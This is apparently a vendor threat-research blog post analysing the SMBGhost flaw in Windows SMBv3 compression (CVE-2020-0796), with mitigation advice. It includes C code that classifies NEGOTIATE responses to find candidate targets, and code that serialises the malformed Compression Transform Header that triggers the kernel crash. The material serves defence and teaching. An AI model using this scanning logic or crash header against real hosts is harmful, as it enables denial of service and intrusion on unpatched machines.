
‘SMBGhost’ Wormable Vulnerability Analysis (CVE-2020-0796)

On March 12, 2020, Microsoft published an official advisory (together with an out-of-band update) for a critical flaw in its implementation of the SMB 3.1.1 protocol. The vulnerability lies in the way the SMBv3 code handles certain compressed request and response messages, and it can let an unauthenticated attacker execute arbitrary code on the target. Because the SMB server and client code run in kernel mode, a successful exploit yields kernel-level code execution rather than a mere user-level foothold. Triggering the flaw requires a specially crafted SMBv3 “Compression Transform Header” request or response PDU. It was assigned CVE-2020-0796 and has been nicknamed SMBGhost or CoronaBlue. CVE-2020-0796 affects Windows 10 versions 1903 and 1909 (and the corresponding Windows Server 1903 and 1909 Server Core installations), the releases that introduced SMB compression. Windows 7 and earlier do not implement SMB 3.1.1 compression and are not affected, and no other Windows release is listed as affected in the advisory.

To identify impacted devices, security professionals can run the “winver” utility (Start > Run > winver, or from a command prompt) and read off the version and build. The screenshot below maps Windows 10 version names to their build numbers and highlights the vulnerable ones: 1903 is build 18362 and 1909 is build 18363. A host on one of these builds is vulnerable unless the March 12, 2020 update (KB4551762) has been installed, so the version check needs to be paired with a patch-level check.

At the time of writing, a Shodan query turned up over 35,000 internet-accessible hosts that are potentially vulnerable.

This bug is rated critical because exploitation requires no authentication, and because the flaw sits in both the server and the client side of the SMBv3 stack: a server can be attacked by any client that can reach TCP port 445, and a client can be attacked by luring it to connect to a malicious SMBv3 server that sends the crafted response.

Publicly available scanners and exploit code focus on two goals:

  • Identifying targets (pre-crash phase) from the SMB NEGOTIATE request and response behavior
  • Triggering the buffer overflow itself (an integer overflow in a length calculation) by sending a malformed Compression Transform Header PDU

In the rest of this post we dive into each of these, explain what triggers the bug, and show how vulnerable and non-vulnerable OSes respond to the same traffic. PCAPs of the attack traffic are available for download for further research.

Technical Analysis

Identifying potential targets

Potential targets can be identified by checking whether the host negotiates SMB 3.1.1 and advertises support for data compression. Scanners send an SMB2 NEGOTIATE request that offers the SMB 3.1.1 dialect together with a compression capabilities negotiate context; the server’s NEGOTIATE response then reveals:

  • The dialect it selected (the SMB version the target OS speaks)
  • NegotiateContextCount and the negotiate contexts themselves
    • A server only sends negotiate contexts when the connection dialect is 3.1.1, the dialect that introduced compression (the format is specified in MS-SMB2). A host that selects 3.1.1 and echoes back a compression capabilities context listing LZNT1 has compression enabled and is a candidate target.

Note that this check only establishes that compression is enabled, not that the host is unpatched: a host with the March 2020 update installed still negotiates 3.1.1 and still advertises compression, so a negotiate-based scan yields potentially vulnerable hosts that must then be confirmed by patch level (or, in a lab, by the crash described below). A host on which compression has been disabled through the registry workaround stops advertising it.

The PCAP analysis below shows how different OSes behave in response to the same request.

Windows 7 (non-vulnerable)

Negotiate Protocol Response (smb2.cmd == 0 && smb2.flags.response == 1)

Dialect (2 bytes): 0x0210 (SMB 2.1)
NegotiateContextCount (2 bytes): 0x0000

The screenshot below demonstrates the scanning behavior when a non-vulnerable host is found:

Windows 10 (vulnerable)

Negotiate Protocol Response (smb2.cmd == 0 && smb2.flags.response == 1)

Dialect (2 bytes): 0x0311 (SMB 3.1.1)
NegotiateContextCount (2 bytes): 0x0200 as the bytes appear on the wire (little-endian), i.e. two negotiate contexts, one of which is the compression capabilities context the scanner asked for

The screenshot below demonstrates the scanning behavior when a vulnerable host is found:
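The classification the scanners perform on the two responses above, as an added example written for this post (it is not the original post's code nor any public scanner's): a small parser walks the NEGOTIATE response and its negotiate contexts per MS-SMB2 and reports whether the host picked SMB 3.1.1 and advertised LZNT1 compression. The two sample responses are constructed by hand to mimic the Windows 7 and Windows 10 captures (dialect 0x0210 with no contexts, and dialect 0x0311 with a preauth-integrity context plus a compression context); they are not bytes from a real host, and the generic SMB2 header fields other than ProtocolId, StructureSize and Flags are left zero.

```c
/* Added example (not from the original post): classify an SMB2 NEGOTIATE response the
 * way the public CVE-2020-0796 scanners do. The sample responses are constructed here
 * by hand to mimic the two captures above; they are not bytes from a real host. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define SMB2_HDR_LEN 64
#define SMB2_NEG_RESP_FIXED 64                 /* fixed part of the NEGOTIATE response */
#define SMB2_DIALECT_311 0x0311
#define SMB2_PREAUTH_INTEGRITY_CAPABILITIES 0x0001
#define SMB2_COMPRESSION_CAPABILITIES 0x0003
#define SMB2_COMPRESSION_LZNT1 0x0001

enum verdict { NOT_SMB2, OLDER_DIALECT, SMB311_NO_COMPRESSION, SMB311_LZNT1 };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Walk the NEGOTIATE response (MS-SMB2 2.2.4) and its negotiate contexts (2.2.3.1). */
enum verdict classify_negotiate_response(const uint8_t *buf, size_t len)
{
    if (len < SMB2_HDR_LEN + SMB2_NEG_RESP_FIXED || memcmp(buf, "\xFESMB", 4) != 0)
        return NOT_SMB2;
    const uint8_t *r = buf + SMB2_HDR_LEN;
    if (rd16(r) != 65) return NOT_SMB2;           /* StructureSize is always 65 */
    uint16_t dialect   = rd16(r + 4);             /* DialectRevision */
    uint16_t ctx_count = rd16(r + 6);             /* NegotiateContextCount */
    uint32_t ctx_off   = rd32(r + 60);            /* NegotiateContextOffset, from start of SMB2 header */
    if (dialect != SMB2_DIALECT_311) return OLDER_DIALECT;   /* older dialects never carry contexts */

    size_t pos = ctx_off;
    for (uint16_t i = 0; i < ctx_count; i++) {
        pos = (pos + 7) & ~(size_t)7;             /* each context starts 8-byte aligned */
        if (pos + 8 > len) break;
        uint16_t type = rd16(buf + pos), dlen = rd16(buf + pos + 2);
        if (pos + 8 + dlen > len) break;
        if (type == SMB2_COMPRESSION_CAPABILITIES && dlen >= 8) {
            /* data: CompressionAlgorithmCount(2) Padding(2) Flags(4) CompressionAlgorithms(2 each) */
            uint16_t n = rd16(buf + pos + 8);
            for (uint16_t j = 0; j < n && 8 + 2 * j + 2 <= dlen; j++)
                if (rd16(buf + pos + 16 + 2 * j) == SMB2_COMPRESSION_LZNT1)
                    return SMB311_LZNT1;
        }
        pos += 8 + dlen;
    }
    return SMB311_NO_COMPRESSION;
}

/* Build a minimal NEGOTIATE response (constructed sample, not a capture). Returns its length. */
size_t build_sample_response(uint8_t *out, size_t cap, uint16_t dialect, int advertise_lznt1)
{
    if (cap < 256) return 0;
    memset(out, 0, cap);
    memcpy(out, "\xFESMB", 4);
    wr16(out + 4, 64);                            /* SMB2 header StructureSize */
    out[16] = 0x01;                               /* Flags: SMB2_FLAGS_SERVER_TO_REDIR (a response) */
    uint8_t *r = out + SMB2_HDR_LEN;
    wr16(r, 65);
    wr16(r + 4, dialect);
    size_t pos = SMB2_HDR_LEN + SMB2_NEG_RESP_FIXED;
    if (dialect != SMB2_DIALECT_311) return pos;  /* Windows 7-like: dialect 0x0210, no contexts */
    wr32(r + 60, (uint32_t)pos);
    /* context 1: preauth integrity (SHA-512, 32-byte salt), always present for 3.1.1 */
    wr16(out + pos, SMB2_PREAUTH_INTEGRITY_CAPABILITIES); wr16(out + pos + 2, 38);
    wr16(out + pos + 8, 1); wr16(out + pos + 10, 32); wr16(out + pos + 12, 0x0001);
    pos = (pos + 8 + 38 + 7) & ~(size_t)7;
    uint16_t count = 1;
    if (advertise_lznt1) {
        /* context 2: compression capabilities with a single algorithm, LZNT1 */
        wr16(out + pos, SMB2_COMPRESSION_CAPABILITIES); wr16(out + pos + 2, 10);
        wr16(out + pos + 8, 1); wr16(out + pos + 16, SMB2_COMPRESSION_LZNT1);
        pos += 8 + 10;
        count = 2;
    }
    wr16(r + 6, count);                           /* NegotiateContextCount: bytes 02 00 on the wire */
    return pos;
}

/* Build a sample and classify it in one call. */
enum verdict scan_sample(uint16_t dialect, int advertise_lznt1)
{
    uint8_t buf[256];
    size_t n = build_sample_response(buf, sizeof buf, dialect, advertise_lznt1);
    return classify_negotiate_response(buf, n);
}

int main(void)
{
    static const char *names[] = { "not SMB2", "older dialect (not vulnerable)",
                                   "SMB 3.1.1 without compression", "SMB 3.1.1 + LZNT1 (candidate target)" };
    printf("Windows 7-like : %s\n", names[scan_sample(0x0210, 0)]);
    printf("Windows 10-like: %s\n", names[scan_sample(SMB2_DIALECT_311, 1)]);
    return 0;
}
```

Pointing this at real traffic means feeding the bytes of the NEGOTIATE response (after the 4-byte NetBIOS session header) into classify_negotiate_response; the verdict SMB311_LZNT1 corresponds to the Windows 10 capture above and, for the reasons given earlier, marks a candidate rather than a confirmed unpatched host.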

Next, let’s understand how the vulnerability is triggered and what causes the blue screen of death (BSOD) on the target machine.

Triggering the Buffer Overflow and Crash

To crash a server, the client sends an SMB2 Compression Transform Header PDU whose length fields do not add up (to attack a client, a malicious server sends the same structure as a response). The fields of the malicious PDU are:

ProtocolId (4 bytes): 0xFC534D42, i.e. the bytes FC 'S' 'M' 'B' (must be present; it marks a compressed PDU)
OriginalSize (4 bytes): the claimed size of the data after decompression (variable, attacker-controlled)
CompressionAlgorithm (2 bytes): LZNT1 (must be 0x0001, the algorithm negotiated earlier)
Flags/Reserved (2 bytes): 0xFFFF
Offset (4 bytes): 0xFFFFFFFF (the largest possible value; -1 when read as a signed 32-bit integer). This field is meant to give the length of uncompressed data that precedes the compressed payload.

The "buffer overflow" is really an integer overflow: the decompression routine adds OriginalSize and Offset to size the buffer it allocates for the decompressed message, and that 32-bit addition wraps when Offset is 0xFFFFFFFF. The result is a tiny allocation, followed by a copy whose length is still taken from the unwrapped Offset, which overruns the buffer in kernel pool memory and crashes the machine with the BSOD.

The screenshot below demonstrates the attack data used that causes the crash:
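The header layout and the length calculation behind the crash, as an added example written for this post (it is not the original post's code and not the srv2.sys decompression routine): the first function serialises the Compression Transform Header with exactly the field values listed above, and the two "model" functions reduce the decompression path to the one computation that matters, OriginalSize + Offset in 32 bits. The vulnerable model performs the unchecked addition and shows it wrapping to OriginalSize - 1; the hardened model shows the checks that make the same input get dropped. Everything beyond that addition (the actual allocation, copy and LZNT1 decompression) is deliberately left out, and the payload length passed to the safe model is a made-up value for the demonstration.

```c
/* Added example, written for this post (not the original post's code and not the
 * srv2.sys decompression routine): serialise the Compression Transform Header
 * described above and model the unchecked 32-bit addition of OriginalSize and
 * Offset that sizes the decompression buffer. The "vulnerable" and "safe" models
 * are simplifications of that one computation, nothing more. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define SMB2_COMPRESSION_LZNT1 0x0001
#define TRANSFORM_HDR_LEN 16

static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }
static uint32_t rd32(const uint8_t *p) { return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24); }

/* Wire layout (MS-SMB2 2.2.42): ProtocolId FC 53 4D 42 | OriginalSize | CompressionAlgorithm | Flags | Offset.
 * Multi-byte fields are little-endian. Returns the header length (16). */
size_t build_transform_header(uint8_t *out, uint32_t original_size, uint16_t algorithm,
                              uint16_t flags, uint32_t offset)
{
    memcpy(out, "\xFCSMB", 4);
    wr32(out + 4, original_size);
    wr16(out + 8, algorithm);
    wr16(out + 10, flags);
    wr32(out + 12, offset);
    return TRANSFORM_HDR_LEN;
}

/* Read the Offset field back out of a serialised header; 0 if it is not a transform header. */
uint32_t transform_header_offset(const uint8_t *buf, size_t len)
{
    if (len < TRANSFORM_HDR_LEN || memcmp(buf, "\xFCSMB", 4) != 0) return 0;
    return rd32(buf + 12);
}

/* Model of the pre-patch size computation: OriginalSize + Offset in 32 bits with no
 * overflow check. With the crash PDU (small OriginalSize, Offset 0xFFFFFFFF) the sum
 * wraps to OriginalSize - 1, so a tiny buffer is allocated while the copy that follows
 * is still driven by the unwrapped Offset. Sets *wrapped when the addition overflowed. */
uint32_t model_vulnerable_alloc_size(uint32_t original_size, uint32_t offset, int *wrapped)
{
    uint32_t total = original_size + offset;      /* unsigned wrap-around is well defined in C */
    *wrapped = total < original_size;
    return total;
}

/* Hardened form of the same computation: reject when the addition would wrap, when Offset
 * points past the bytes actually received after the header, or when the algorithm is not
 * the one negotiated (LZNT1 here). Returns the size to allocate, or 0 to drop the PDU. */
uint32_t model_safe_alloc_size(uint32_t original_size, uint16_t algorithm, uint32_t offset,
                               size_t payload_len)
{
    if (algorithm != SMB2_COMPRESSION_LZNT1) return 0;
    if (offset > payload_len) return 0;
    if (original_size > UINT32_MAX - offset) return 0;
    return original_size + offset;
}

int main(void)
{
    uint8_t hdr[TRANSFORM_HDR_LEN];
    build_transform_header(hdr, 0x10, SMB2_COMPRESSION_LZNT1, 0xFFFF, 0xFFFFFFFF);
    printf("crash PDU header:");
    for (size_t i = 0; i < TRANSFORM_HDR_LEN; i++) printf(" %02X", hdr[i]);
    int wrapped = 0;
    uint32_t bad = model_vulnerable_alloc_size(0x10, 0xFFFFFFFF, &wrapped);
    printf("\nvulnerable model allocates %u bytes (wrapped=%d)\n", (unsigned)bad, wrapped);
    /* 64 is a made-up payload length standing in for "bytes received after the header" */
    printf("hardened model allocates %u bytes (0 = rejected)\n",
           (unsigned)model_safe_alloc_size(0x10, SMB2_COMPRESSION_LZNT1, 0xFFFFFFFF, 64));
    return 0;
}
```

The point of the two models is the contrast: the same 16 header bytes yield a 15-byte allocation from the unchecked addition and a rejected PDU from the checked one. Any parser that trusts two attacker-supplied lengths added together needs the bounds checks shown in model_safe_alloc_size (or a checked-add helper) before the result is used to size memory.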

Impact and Mitigation

According to Microsoft, the flaw allows remote code execution and is wormable: malware could use it to spread from host to host with no user interaction. We expect wide exploitation to follow quickly. There are parallels with WannaCry, which spread over SMBv1 using the EternalBlue exploit leaked by the Shadow Brokers, even though the exploitation technique is different here. With scanners and proof-of-concept crash code already public, we anticipate the bug being used for lateral movement and for spreading ransomware and other threats, including the COVID-19-themed malware we are already observing.

Awake recommends patching all affected devices immediately per the official Microsoft advisory. Block inbound TCP port 445 at the network perimeter so that SMB is never reachable from the internet, and restrict it internally where possible. If patching is not yet an option, apply the workaround from the advisory: set the DisableCompression DWORD value to 1 under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters (no reboot is required), which stops the server from negotiating compression. Note that this workaround protects only the SMB server side; a client that connects to a malicious server remains exposed until it is patched.

Sujit Ghosal

Sr. Threat Researcher